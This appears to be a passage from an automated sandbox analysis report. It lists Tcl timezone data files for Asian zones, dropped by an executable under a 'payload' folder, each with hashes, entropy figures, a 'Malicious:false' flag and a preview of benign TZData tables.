                                                                                                                                                                                                                                            SHA1:1DD135B79CC0D81C048D7B2C6BE0CF71171DD19E
                                                                                                                                                                                                                                            SHA-256:705D6D8360C2DCD51E909E39E1910FE876145220D151031612DA36B247207395
                                                                                                                                                                                                                                            SHA-512:2D32AAAF1BCC865B5F2810BFE0FB82BE98140BB5F2ECA1DA7FD148A3074DA127B81242F17B8BA9C9E259B61CBB123FD1513CCE6A85C8D7679ADFC0D689B552BB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Srednekolymsk) {.. {-9223372036854775808 36892 0 LMT}.. {-1441188892 36000 0 +10}.. {-1247565600 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1344
                                                                                                                                                                                                                                            Entropy (8bit):4.062084847879695
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5X2eIvZPzGzHjZBHNHlQHKn3HnHNd9HiHkHBHaHLHMtyH9Qm+zHFOzHZ32HZvHiR:5Xi1ypBvt1mwO3Kq46T
                                                                                                                                                                                                                                            MD5:AECA800C8F2A679D0B19E5BB90AFD858
                                                                                                                                                                                                                                            SHA1:2C7DCEB709F9A4312C511971FE1E6A9DC1FBD0E8
                                                                                                                                                                                                                                            SHA-256:389C9D3EE2970665D0D8C5CB61B8B790C5FBDDC0DF0BF2B9753046F5953A477F
                                                                                                                                                                                                                                            SHA-512:C2D6BB4FEB5848D0704647D26F94C0BD8CD7E834AA2187EC9C877E80157E9CC225BBA3BECEE0148894C8639105D292AB50EE95830992BF357C632ACF001E020F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Taipei) {.. {-9223372036854775808 29160 0 LMT}.. {-2335248360 28800 0 CST}.. {-1017820800 32400 0 JST}.. {-766224000 28800 0 CST}.. {-745833600 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716889600 32400 1 CDT}.. {-699613200 28800 0 CST}.. {-683884800 32400 1 CDT}.. {-670669200 28800 0 CST}.. {-652348800 32400 1 CDT}.. {-639133200 28800 0 CST}.. {-620812800 32400 1 CDT}.. {-607597200 28800 0 CST}.. {-589276800 32400 1 CDT}.. {-576061200 28800 0 CST}.. {-562924800 32400 1 CDT}.. {-541760400 28800 0 CST}.. {-528710400 32400 1 CDT}.. {-510224400 28800 0 CST}.. {-497174400 32400 1 CDT}.. {-478688400 28800 0 CST}.. {-465638400 32400 1 CDT}.. {-449830800 28800 0 CST}.. {-434016000 32400 1 CDT}.. {-418208400 28800 0 CST}.. {-402480000 32400 1 CDT}.. {-386672400 28800 0 CST}.. {-370944000 32400 1 CDT}.. {-355136400 28800 0 CST}.. {-3394080
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):878
                                                                                                                                                                                                                                            Entropy (8bit):3.9280321712564845
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5geQqdNRvOt81FCuLqecDngO6jPvTpYy5T4TXvKT10Sv6r:5+EvdJqxiF0rvK50Sv6r
                                                                                                                                                                                                                                            MD5:DB59DB8E401E12917B7367D5604D3DE6
                                                                                                                                                                                                                                            SHA1:7CC7C5C1DB551BD381B833C81746201D36BC59A9
                                                                                                                                                                                                                                            SHA-256:4445F3F892C7267A6867009CC1A3F0B0548D0240408375A9D15360B28993C2A9
                                                                                                                                                                                                                                            SHA-512:2C7AE63C408A9F06F973AAC16845E1DBE92D15A421BBBE420914F21155AD5E57CD058D7E4427E43185E023D2FF475EBF9D74003ECEF004FF4E5F9D5681ADFB80
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tashkent) {.. {-9223372036854775808 16631 0 LMT}.. {-1441168631 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {694206000 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1729
                                                                                                                                                                                                                                            Entropy (8bit):3.6815162494646034
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5yBeqvIdZlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPqUsx9Ul4N:5MmsUf8mFpNWFnytO6VnYK
                                                                                                                                                                                                                                            MD5:C376C9ED66F6CC011E063D3E8E0DCED1
                                                                                                                                                                                                                                            SHA1:13C6345F8CB0EC79FE7C78B156C5737BCB66E49E
                                                                                                                                                                                                                                            SHA-256:B637BB0E49144C717E99E93540CB2C4D3695D63B91FE42547F2F0AA006498693
                                                                                                                                                                                                                                            SHA-512:FD60192CBEDC91C5D6B3B5E6F19DEDCAE14DCF48DCAE6D4865A8F0BBDC01CBF8DAAE92C4C46C353AF5B3EEE36CCC87B23F193DDF221132F5404C42507B708364
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tbilisi) {.. {-9223372036854775808 10751 0 LMT}.. {-2840151551 10751 0 TBMT}.. {-1441162751 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {694213200 10800 0 +03}.. {701816400 14400 1 +03}.. {717537600 10800 0 +03}.. {733266000 14400 1 +03}.. {748
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2354
                                                                                                                                                                                                                                            Entropy (8bit):3.666553647637418
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Z2eendFalxbr1p4USUcESUUxSuEqzSUUongA3jJW3eY37U8uuZrc3cNWH1/ANzx:54G9SOSWzx1qcK83kv3OR0xV1ox
                                                                                                                                                                                                                                            MD5:A7A174A14E51E0ACD7092D2A5AA50F99
                                                                                                                                                                                                                                            SHA1:69ADDDDB68084B90819AD49A5230D5B0E1A9CD85
                                                                                                                                                                                                                                            SHA-256:25870503A8A679DA13B98117BD473EAA0C79B094B85D3AD50629FF0946D5EACE
                                                                                                                                                                                                                                            SHA-512:1ECFB558B13C94BDC848E7BBBB0CA1BB854BB12E112EBF306045EC14F00CE3E3C2DA51EBA8AF2D63C95D71B945647C3D9E9881158FE128DEBE940A742C4BFEB1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tehran) {.. {-9223372036854775808 12344 0 LMT}.. {-1704165944 12344 0 TMT}.. {-1090466744 12600 0 +0330}.. {227820600 16200 1 +0330}.. {246227400 14400 0 +04}.. {259617600 18000 1 +04}.. {271108800 14400 0 +04}.. {283982400 12600 0 +0330}.. {296598600 16200 1 +0330}.. {306531000 12600 0 +0330}.. {322432200 16200 1 +0330}.. {338499000 12600 0 +0330}.. {673216200 16200 1 +0330}.. {685481400 12600 0 +0330}.. {701209800 16200 1 +0330}.. {717103800 12600 0 +0330}.. {732745800 16200 1 +0330}.. {748639800 12600 0 +0330}.. {764281800 16200 1 +0330}.. {780175800 12600 0 +0330}.. {795817800 16200 1 +0330}.. {811711800 12600 0 +0330}.. {827353800 16200 1 +0330}.. {843247800 12600 0 +0330}.. {858976200 16200 1 +0330}.. {874870200 12600 0 +0330}.. {890512200 16200 1 +0330}.. {906406200 12600 0 +0330}.. {922048200 16200 1 +0330}.. {937942200 12600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.876713308636272
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq85zFFfXHAIgN0AzFFVHRL/2WFK+TT52WFKYzFgn:SlSWB9vsM3yZbPHAIgCAXRN/2wKsswKR
                                                                                                                                                                                                                                            MD5:40B15013485EE2138A3DCB915F9121E7
                                                                                                                                                                                                                                            SHA1:3ADBE38686C7CA1FDE3DDD12BE908F39BFD1E228
                                                                                                                                                                                                                                            SHA-256:07537A30E6236D9E334DAFD5C4D352D25FDEF95D6DC7496F5D93EFAB74D9EBB1
                                                                                                                                                                                                                                            SHA-512:DA3B7B44B3BEF07CA8AA5253BF684A838181D8A15D7CCF0447A6B5F5BAE28D155CF65BCFB6286EB36C0B9F4FDD1FE862A3297ADB6FC33532B9F766334283D725
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Jerusalem)]} {.. LoadTimeZoneFile Asia/Jerusalem..}..set TZData(:Asia/Tel_Aviv) $TZData(:Asia/Jerusalem)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.906503135441824
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8kNZ4WXHAIgNqFNKARL/2WFK9Z752WFKvNZovn:SlSWB9vsM3ykZ42HAIgc3KAN/2wKf126
                                                                                                                                                                                                                                            MD5:081862B6FB33389BEC9B0E6B500AA342
                                                                                                                                                                                                                                            SHA1:AF9467BB87C4C28921DF62A87B81223052F9FF4A
                                                                                                                                                                                                                                            SHA-256:37459C17B59639DF62B3F3943751902CE6AAF1F11B7630069DB45052EBEFB5B9
                                                                                                                                                                                                                                            SHA-512:CAF6F1C928528C4471229A2EF2944623545626532986628E6CE38884535286A0B38BA88C1A295E8B11322475D6BFAC61BF89786A76330C1A0C729339A3532BAF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Thimphu)]} {.. LoadTimeZoneFile Asia/Thimphu..}..set TZData(:Asia/Thimbu) $TZData(:Asia/Thimphu)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.887493603495978
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKvNZJMXGm2OHEQUTFnoHqVaJKuc/v6Q61V9gmZVFSTVV:SlSWB9eg/2wKVZJDm2OHEfnoHDKuc/SC
                                                                                                                                                                                                                                            MD5:F239452984CCA9F23E97A880652C39E6
                                                                                                                                                                                                                                            SHA1:52D25282D03B79960F152D21E7492EE26DAEBBAA
                                                                                                                                                                                                                                            SHA-256:B797C74E3840298C3CD8149FC8AA4BCE839EFE79E7C3310986FF23C965607929
                                                                                                                                                                                                                                            SHA-512:1044BEDAE04FCA7BD62937AFCE70F6C447583A90DD1596C3029A64A8251E3F73C106F4D940548DD38E895D67FEFDCD196B257E11437DEB399085EE80C345AA50
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Thimphu) {.. {-9223372036854775808 21516 0 LMT}.. {-706341516 19800 0 +0530}.. {560025000 21600 0 +06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):388
                                                                                                                                                                                                                                            Entropy (8bit):4.470556147950505
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862ymdHOx5CvAoK3zoiIxtoFDIe+zT0agbov:5yeOCvARzzCOVa/gby
                                                                                                                                                                                                                                            MD5:3CCC15B63A882DB1B7459A51CD1C8165
                                                                                                                                                                                                                                            SHA1:77A3EFE6E4EE524B9EC6F51593DD7521FD7B8DAD
                                                                                                                                                                                                                                            SHA-256:3DA522FA88541A375D53F30A0B62DC4A305FA0315FEE534B7998C9E0A239450A
                                                                                                                                                                                                                                            SHA-512:15238E96DABAB5D2B9FFD25B3F50417ED32205FA69239D6F6B28DA97A378D669FD409164964D0DD2A5B1D795C8F60E8D4EB15924046348C3D6010646A536E07C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tokyo) {.. {-9223372036854775808 33539 0 LMT}.. {-2587712400 32400 0 JST}.. {-683802000 36000 1 JDT}.. {-672310800 32400 0 JST}.. {-654771600 36000 1 JDT}.. {-640861200 32400 0 JST}.. {-620298000 36000 1 JDT}.. {-609411600 32400 0 JST}.. {-588848400 36000 1 JDT}.. {-577962000 32400 0 JST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2116
                                                                                                                                                                                                                                            Entropy (8bit):3.695316005718174
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5CeLz/XJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEno:5H040yVRB7VfXucydm4IqtTTDOS
                                                                                                                                                                                                                                            MD5:E95DE93CBCE72C5E02D7ECFE94C96308
                                                                                                                                                                                                                                            SHA1:59A49EBFE544D97545BADFEFE716BB5659C64C20
                                                                                                                                                                                                                                            SHA-256:6B64A01D0F0B5EC7A1410C3BD6883BA7CC133E9F073D40E8BFECE037E3A3FA24
                                                                                                                                                                                                                                            SHA-512:9E33DC9C1C6D60F3226263C484AF46A14AAB31F838516A0D69BA08F8F416EF10D09697E8D7ABAC1CE1F5BCE8AB0C2635D99FBE70C89ECC268DED0DCE89E67466
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tomsk) {.. {-9223372036854775808 20391 0 LMT}.. {-1578807591 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {7647084
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.897140749162557
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8pYFfXHAIgNzGRRL/2WFKPQOrFJ4WFKov:SlSWB9vsM3yWFPHAIg0RN/2wKPQOrFJD
                                                                                                                                                                                                                                            MD5:F6AE33D706C36FDD8A21F44AD59F5607
                                                                                                                                                                                                                                            SHA1:94D6EC7A437249AEBE2FA4AF8AFB029A620368C0
                                                                                                                                                                                                                                            SHA-256:732751845ACEDBFFD3C6170F4B94CB20B25BFDCFCC5EEA19F4BE439F5C5B573A
                                                                                                                                                                                                                                            SHA-512:2314AB2B154887842211C9A570BC1323D9B4375FF60C96296835DB001E8A277CA62D40B8562BC34EDDF281D96D5325640B79F7907558C6E0319C7D2A76BE239C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Makassar)]} {.. LoadTimeZoneFile Asia/Makassar..}..set TZData(:Asia/Ujung_Pandang) $TZData(:Asia/Makassar)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1590
                                                                                                                                                                                                                                            Entropy (8bit):3.7728141273024374
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5IerIvusF7cCGK6zoCjZte3kzMjsBw0oZzlL98oysHqGzJvqE+ksabzdX+YjL:5VujmUCei46oljFC67
                                                                                                                                                                                                                                            MD5:A4647294401D2B54ABAA8E509BF05A6F
                                                                                                                                                                                                                                            SHA1:BF804CC38996D7715E3BA9BAD715D7ADBED781B9
                                                                                                                                                                                                                                            SHA-256:A56A26981163A717CF388A423CFE7A2BAD1BE8652BE2E338670CBC0C0A70E5E9
                                                                                                                                                                                                                                            SHA-512:B43157FABDE016FA6636CAB7B06CC1DEA53526B42FB46BB41DC4B7E48188D191C325BEF0D170B125E885F321C4316746A8D478D798828E2DC4A51C71DA4A610C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ulaanbaatar) {.. {-9223372036854775808 25652 0 LMT}.. {-2032931252 25200 0 +07}.. {252435600 28800 0 +08}.. {417974400 32400 1 +08}.. {433782000 28800 0 +08}.. {449596800 32400 1 +08}.. {465318000 28800 0 +08}.. {481046400 32400 1 +08}.. {496767600 28800 0 +08}.. {512496000 32400 1 +08}.. {528217200 28800 0 +08}.. {543945600 32400 1 +08}.. {559666800 28800 0 +08}.. {575395200 32400 1 +08}.. {591116400 28800 0 +08}.. {606844800 32400 1 +08}.. {622566000 28800 0 +08}.. {638294400 32400 1 +08}.. {654620400 28800 0 +08}.. {670348800 32400 1 +08}.. {686070000 28800 0 +08}.. {701798400 32400 1 +08}.. {717519600 28800 0 +08}.. {733248000 32400 1 +08}.. {748969200 28800 0 +08}.. {764697600 32400 1 +08}.. {780418800 28800 0 +08}.. {796147200 32400 1 +08}.. {811868400 28800 0 +08}.. {828201600 32400 1 +08}.. {843922800 28800 0 +08}.. {859
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.728285544456033
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8TcXkXHAIgNrfcXORL/2WFKhrMEBQWFKucXB:SlSWB9vsM3yXHAIgTN/2wKhrMEewKX
                                                                                                                                                                                                                                            MD5:D2EAEA6182FB332CAA707B523F6C8A9D
                                                                                                                                                                                                                                            SHA1:3BFC654E2B3BCF902AF41AEEC46772C84FFF3890
                                                                                                                                                                                                                                            SHA-256:D17FDAF17B3DAC3A1310E2332F61585598185E64CED799ABD68249EB5B698591
                                                                                                                                                                                                                                            SHA-512:E16BEE28BFE3AFFFE6F0025C09D0D65001F38D5045AAB1B554E4D3A66A88273F985B7BAA11F8D26E76E5ABC9F559E3E4B794CC939AAD5FF012A5A47924D08CB3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ulaanbaatar)]} {.. LoadTimeZoneFile Asia/Ulaanbaatar..}..set TZData(:Asia/Ulan_Bator) $TZData(:Asia/Ulaanbaatar)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):149
                                                                                                                                                                                                                                            Entropy (8bit):5.006390440264841
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKjhfMXGm2OHEVPoHsWA0GVFSTVVn:SlSWB9eg/2wKjJDm2OHEVPoH3A0CUX
                                                                                                                                                                                                                                            MD5:D6245CAAEC9BA2579F4CEFFF196A9369
                                                                                                                                                                                                                                            SHA1:4D182953F2CEEFF3583265F977B14F40C1A2FB43
                                                                                                                                                                                                                                            SHA-256:C445B8030DEDDDED0AFF5CC692CC323B63BE8C14BBD42DC3FDE90AD4F9D14785
                                                                                                                                                                                                                                            SHA-512:A32C477B6FAA79247907D1C4E2DF400B05AF4B529277C4CE12B33097872311E3F579115DC8CBA93DAC936928FD574414F3473A9CB7C8E85AB57CCA57489B60F8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Urumqi) {.. {-9223372036854775808 21020 0 LMT}.. {-1325483420 21600 0 +06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2058
                                                                                                                                                                                                                                            Entropy (8bit):3.773734429231407
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5petrlfgLv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKxKG:5Ysv+0j6lua2Gg/3gO8UoOZU2Wc/pKF
                                                                                                                                                                                                                                            MD5:5ADD78E4AFCBA913D078A8790861A2DE
                                                                                                                                                                                                                                            SHA1:BB63A762D5D76C0FD3CB9AB2BCDE95718E1C99EB
                                                                                                                                                                                                                                            SHA-256:9D639C0FC69B3BEEBC96969092F9590EB48E7946E901B225BF245E165973B9A8
                                                                                                                                                                                                                                            SHA-512:7C2418FD1F96F101B83E2ABDF2551405C6E429DBBF30A2FA7CD2477E2CE1CEEBB790C51B28AEFF043BA7A7A914CEF3C812668058D69225B9FE9475C56508453D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ust-Nera) {.. {-9223372036854775808 34374 0 LMT}.. {-1579426374 28800 0 +08}.. {354898800 43200 0 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {764694000 43200 1 +12}.. {780418
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.858039387006872
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/2WFKgTjEHp4WFKELt:SlSWB9vsM3y1LePHAIgKELtAN/2wKgsX
                                                                                                                                                                                                                                            MD5:D23A09C84A5368FBB47174BC0A460D14
                                                                                                                                                                                                                                            SHA1:045A72FEA79C75E5F0029BD110E33A022C57DFAB
                                                                                                                                                                                                                                            SHA-256:18F5E4FE8247F676278AC5F1912AC401DC48DF5B756D22E76FF1CFA702F88DA7
                                                                                                                                                                                                                                            SHA-512:404EABC2FC162E18C678CED063249C7FF4C28653880EA1903CE846FD191CD1C5B61E0610736F250B79BBAC768B1AFD6B9A8824D56D74591A95D7301B47D48387
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Asia/Vientiane) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2062
                                                                                                                                                                                                                                            Entropy (8bit):3.7094518963173035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:56beOUYQ7FyDy3le3i96VwAmnuBNuTw6vl9O8nfipRkwhUZDAcD:56cYQBIy343dVNUIukElcXRDhUBAcD
                                                                                                                                                                                                                                            MD5:5C0C094B088D0212182E7B944197D4FE
                                                                                                                                                                                                                                            SHA1:CF43A511FE9CD295207DF350704462E09D4D5278
                                                                                                                                                                                                                                            SHA-256:2558C96E25359C72F168DAC6FB3C16C54F8FD7D0724EEB1671156D4A1F42AC6C
                                                                                                                                                                                                                                            SHA-512:5D659EBDC8C2B06C964B083ECC78B4370A4658590D83F020CD23910C44E2D8DAFE69F61E8EB569E1905E89F38CD03ABE6B92F6CE36CF0B1EE0732A7645AFA65D
                                                                                                                                                                                                                                            Malicious:false
